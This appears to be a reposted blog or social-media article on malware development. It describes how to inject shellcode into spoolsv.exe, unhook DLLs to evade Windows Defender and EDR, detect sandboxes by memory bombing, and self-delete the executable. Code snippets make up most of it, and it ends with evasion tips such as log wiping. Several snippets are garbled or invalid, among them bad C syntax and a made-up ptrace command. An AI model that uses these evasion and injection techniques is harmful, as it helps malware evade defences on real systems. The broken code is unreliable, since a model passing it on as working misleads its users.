Bypassing Windows Defender with DLL Unhooking and Process Injection

Listen to this Post

Last year, when I was starting out with malware development, I created a “self-deleting” executable that injects shellcode into “OneDrive.exe” using “Process Injection”.

Recently, I wanted to use this in a CTF lab I was practicing on, but now Windows Defender flags it almost immediately. So I incorporated a “DLL unhooking” technique I learned from iRedTeam to bypass Defender.

👉 This time, I am injecting the remote shellcode into “spoolsv.exe” (Windows Print Spooler service), which I found to be more reliable than “svchost.exe” or “winlogon.exe”.
👉 Also, to bypass dynamic analysis, I incorporated a method I learned from John Ford: “memory bombing”, where you try to allocate a large amount of memory and check if the allocation fails. In sandboxed environments, memory allocation limits are usually low.

You Should Know:

1. Process Injection Techniques

  • Classic DLL Injection:
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    LPVOID pDllPath = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, pDllPath, (LPVOID)dllPath, strlen(dllPath), NULL);
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA"), pDllPath, 0, NULL);
    

  • Process Hollowing (GhostProcess):
    Replaces the memory of a legitimate process (e.g., svchost.exe) with malicious code.

2. DLL Unhooking for EDR/AV Evasion

EDRs hook Windows APIs to monitor malicious activity. Unhooking restores original function bytes:

BOOL UnhookDLL(const char libName) {
HMODULE hModule = GetModuleHandleA(libName);
HANDLE hFile = CreateFileA("original_dll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
LPVOID pFileData = MapViewOfFile(hFile, FILE_MAP_READ, 0, 0, 0);
// Overwrite hooked functions with clean bytes
memcpy((void)hModule, pFileData, 0x1000); // Example: restore first 4KB
CloseHandle(hFile);
return TRUE;
}

3. Memory Bombing for Anti-Sandboxing

Allocate large memory chunks to detect sandboxes:

bool IsSandboxed() {
LPVOID pMem = NULL;
for (int i = 0; i < 10; i++) {
pMem = VirtualAlloc(NULL, 1GB, MEM_COMMIT, PAGE_READWRITE);
if (pMem == NULL) return true; // Likely sandboxed
VirtualFree(pMem, 0, MEM_RELEASE);
}
return false;
}

4. Spoolsv.exe Injection (Reliable Target)

The Print Spooler service (spoolsv.exe) is often overlooked by AV:

 Find spoolsv.exe PID:
Get-Process spoolsv | Select-Object Id

5. Self-Deleting Executable

Use batch scripting to delete the malware after execution:

@echo off
start /B malware.exe
del "%~f0"

What Undercode Say:

Process injection and AV evasion are critical in red teaming. Key takeaways:
– Use lesser-monitored processes like spoolsv.exe.
– Restore hooked DLLs to bypass EDRs.
– Detect sandboxes via memory/resource checks.
– Clean traces (self-deletion, log wiping).

Relevant Commands:

  • Linux Equivalent (ptrace injection):
    gcc -shared -o libinject.so inject.c && sudo ptrace -p $PID -x libinject.so
    
  • Windows API Calls:
    NtCreateSection, NtMapViewOfSection // For advanced injection
    

Expected Output:

A stealthy payload executing in `spoolsv.exe` while evading Defender and EDR hooks.

Reference URLs:

References:

Reported By: Kavishka Fernando – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image